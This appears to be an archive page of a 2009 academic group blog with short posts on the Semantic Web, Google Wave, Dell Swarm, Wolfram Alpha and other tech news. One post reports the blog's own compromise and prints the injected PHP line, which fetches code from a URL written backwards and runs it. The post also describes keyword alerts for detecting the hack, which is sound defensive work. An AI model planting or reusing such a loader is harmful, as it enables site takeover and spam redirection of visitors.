Price Waterhouse Coopers bullish on the Semantic Web

May 29th, 2009

Price Waterhouse Coopers is one of the largest “professional services” organization and has always been strong on technology consulting and advice. The Spring issue of their quarterly Technology Forecast journal focuses on the Semantic Web. This is from the table of contents


  • 04 Spinning a data Web. Semantic Web technologies could revolutionize enterprise decision making and information sharing. Here’s why.
  • 20 Making Semantic Web connections. Linked Data technology can change the business of enterprise data management.
  • 16 Traversing the Giant Global Graph. Tom Scott of BBC Earth describes how everyone benefits from interoperable data.
  • 28 From folksonomies to ontologies. Uche Ogbuji of Zepheira discusses how early adopters are introducing Semantic Web to the enterprise.
  • 40 How the Semantic Web might improve cancer treatment. M. D. Anderson’s Lynn Vogel explores new techniques for combining clinical and research data.
  • 46 Semantic technologies at the ecosystem level. Frank Chum of Chevron talks about the need for shared ontologies in the oil and gas industry.

You can download the free 58 report here. You can also read a note on the issue in ReadWriteWeb, which focuses on linked data and interoperability.

“A new PricewaterhouseCoopersTechnology report explains how the Semantic Web and Linked Data can help enterprises manage their large scale data better. The PwC Center for Technology and Innovation team spent several months researching and analyzing the problem of data silos in enterprises – and what solutions are being developed to help with that problem. The answer, according to PwC, is Semantic Web techniques. PwC believes that the Semantic Web offers a practical way to address the problem of large-scale data integration. … “

(Spotted on

Baltimore MD BarCamp on 20 June 2009

May 28th, 2009

There will be a bar camp in Baltimore on Saturday, 20 June 2009 at the University of Baltimore. Bar camps are unconferences — ‘open, participatory workshop-events, whose content is provided by participants”.

Here’s how the Baltimore Sun described it:

“Organizers have scheduled the event on June 20 at the university’s Thumel Business Center. Following the BarCamp format, the event will have no pre-set agenda. Instead, attendees who show up that morning will determine the day’s program by suggesting and voting on topics. Such events usually attract artists, designers and people who work in technology and the Web. BarCamps got their start in California four years ago, and are now held all over the world. For more information, visit, or contact Mike Subelsky, an organizer, at Additional information about the BarCamp model can be found at

At last year’s Baltimore BarCamp was focused on social media — see the blog post by UMBC ebiquity alumnus Dr. Harry Chen.

Google Wave as a new communication model

May 28th, 2009

Google wave looks interesting. Google describes it as “a new tool for communication and collaboration on the web” and it’s a funny mix of email, instant messaging, wikis, and Facebook wall interactions. Or maybe IRC for the new century. This is from a post, Went Walkabout. Brought back Google Wave, on the Google blog.

“A “wave” is equal parts conversation and document, where people can communicate and work together with richly formatted text, photos, videos, maps, and more. Here’s how it works: In Google Wave you create a wave and add people to it. Everyone on your wave can use richly formatted text, photos, gadgets, and even feeds from other sources on the web. They can insert a reply or edit the wave directly. It’s concurrent rich-text editing, where you see on your screen nearly instantly what your fellow collaborators are typing in your wave. That means Google Wave is just as well suited for quick messages as for persistent content — it allows for both collaboration and communication. You can also use “playback” to rewind the wave and see how it evolved.”

Google Wave is not available yet, but you can sign up to be notified when it’s launched.

Here’s a random thought. Our models for communication in multiagent systems (e.g., KQML and FIPA) were informed by if not based on email and, to a lesser degree, IM. If Wave is a useful new communication model for humans, does it have a counterpart for software agents? If so, I suspect that ideas from the Semantic Web will be useful to provide a “rich content” for agents.

For more views, see posts by o’reilly, techcrunch, BusinessWeek and Gabor Cselle.

Dell Swarm: social network buying groups

May 27th, 2009

Dell is exploiting social networks in a new marketing scheme being tried out in Singapore. If you agree to buy a laptop on Dell Swarm, the discounted price drops as others join your “swarm” and also buy. Here’s how Dell describes it:

  • Start by picking the laptop you would like to purchase. Be the first buyer to join a Swarm and you’ll enjoy a price lower than’s best discounted price (after cash rebates).
  • Join a Swarm after, and you’ll enjoy a new, lower price – as will all previous buyers. To see the range of prices, simply slide the Swarm price bar downwards.
  • Once the swarms closes – which is when the limit of 15 buyers or 72 hours is reached, whichever is the earlier, the price is then finalised. This final, lowest price now becomes everyone’s purchase price – including yours!
  • To get the maximum discount, grow the Swarm by Sharing with your friends. You can share via Twitter Or post a note on your Facebook® profile and tell all of your friends Point others towards your Swarm using Digg, and other tools. Or simply send your friends an email directly!
  • Not ready to buy yet? You can also choose to Follow the Swarm. You’ll then receive updates via email. As well as through free SMS alerts.

We’ve seen this idea on the Web before (e.g., see Group Buying), but it is usually framed as a tool by and for consumers rather than a marketing strategy employed by vendors. This could be a big win for Dell. If it is, others will follow. The penetration of online social networking systems is much greater now and finding ways to exploit them for marketing is irresistible.

UCSD Data Mining Contest

May 24th, 2009

For the past five years UCSD has run a student datamining contest sponsored by FICO, the decision management firm famous for developing the FICO credit score. The details of the 2009 datamining contest were released last week with results due on 15 July.

“This year’s contest consists of two classification tasks based on e-commerce transaction anomaly data. The first task is to maximize accuracy of binary classification on a test data set, given a fully labeled training data set. The performance metric is the lift at 20% review rate. The second task is similar to task 1, but provides a couple of additional fields that have potential predictive information.”

The contest is open to all full-time undergraduate and graduate students as well as postdocs. A total of $8,000 in prize money will be awarded in various categories.

(spotted on Hacker News)

Monitor Twitter for news of the zombie apocalypse

May 21st, 2009

Who says that Twitter is not useful? The Boston Police Department is on record as promising to use twitter to alert us if and when the zombie apocalypse starts. You might want to check for #zombie before you go out the door in the morning.

Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot=""; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography
  • viagra OR cialis OR levitra OR Phentermine OR Xanax

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.

Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.

Wolfram Alpha is live, API description online

May 15th, 2009

Wolfram!Alpha is live. A document describing the Wolfram Alpha API can be found in Google’s cache.

Steve Wolfram wrote today in a blog post, Wolfram|Alpha Is Launching: Made Possible by Mathematica, on its relation to Mathematica.

“Wolfram|Alpha defines a new direction in computing—that would have simply not have been possible without Mathematica, and that in time will add some remarkable new dimensions to Mathematica itself. In terms of technology, Wolfram|Alpha is a uniquely complex software system, which has been entirely developed and deployed with Mathematica and Mathematica technologies. … When we launch Wolfram|Alpha this weekend, it will be running Mathematica on about 10,000 processor cores, using gridMathematica-based parallelism. And every single query that comes into the system will be served with webMathematica.”

And now, for a real test…

(spotted on Hacker News)

UPDATE: (5/18) The API document is officially now available.

Google supports RDFa and Microformats

May 12th, 2009

Google has announced that it will begin to recognize structured information encoded as metadata in either RDFa and in Microformats and use the metadata in search results snippets for reviews and people.

“Structured data makes the web a better place. It also helps Google better understand and present your page in search results. … Google’s first use of this data will be in search results snippets for two kinds of objects: Reviews and People. Providing more detail in search results helps users to understand the value of your pages. When users get more information showing how your page is relevant to their search, they’re more likely to click through to see the full page. … At Google, we believe in openness, so we are using two open standards to allow you to annotate structured data on your site: microformats and RDFa. Both standards allow markup of information on your pages.”

This is a case where Google is following Yahoo, which announced more general support for RDFa and microformats last Fall in their Search Monkey.

We expect that this is work in progress. While it’s great that Google is supporting RDFa annotations, they are asking people to start with the new RDF vocabulary defined at their site rather than reusing or integrating with existing, widely used vocabularies. Let’s hope that they embrace the LOD vision in the near future.

Can a programming language make you happy?

May 11th, 2009

We all know that some programming languages are a joy to use and others can be damned painful. Lukas Biewald ran an interesting experiment to gather some data about this in his post, The Programming Language with the Happiest Users.

“Which languages make programmers the happiest? … I decided to do a little market research. I scraped the top 150 most recent tweets on Twitter for the query “X language” where X was one of {COBOL, Ruby, Fortran, Python, Visual Basic, Perl, Java, Haskell, Lisp, C}. Then I asked three people on Amazon Mechanical Turk to verify that the tweet was on the topic. If so, I asked if the tweet seemed positive, negative or neutral. …”

Great idea and a nice use of Amazon Mechanical Turk!

Analyzing covert social networks

May 10th, 2009

Science Daily notes a social networking paper that sounds interesting.

“A new approach to analyzing social networks, reported in the current issue of the International Journal of Services Sciences, could help homeland security find the covert connections between the people behind terrorist attacks. The approach involves revealing the nodes that act as hubs in a terrorist network and tracing back to individual planners and perpetrators.”

Yoshiharu Maeno, Yukio Ohsawa, Analyzing covert social network foundation behind terrorism disaster, nt. J. Services Sciences, 2009, 2, pp.125-141. (preprint).

Abstract: This paper addresses a method to analyse the covert social network foundation hidden behind the terrorism disaster. It is to solve a node discovery problem, which means to discover a node, which functions relevantly in a social network, but escaped from monitoring on the presence and mutual relationship of nodes. The method aims at integrating the expert investigator’s prior understanding, insight on the terrorists’ social network nature derived from the complex graph theory and computational data processing. The social network responsible for the 9/11 attack in 2001 is used to execute simulation experiment to evaluate the performance of the method.

Storms on Planet Social Media Research

May 7th, 2009

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. ( I was to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that the Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us as planet-smr at

update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the freebase IP address in the server’s /etc/hosts table. I think we added when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.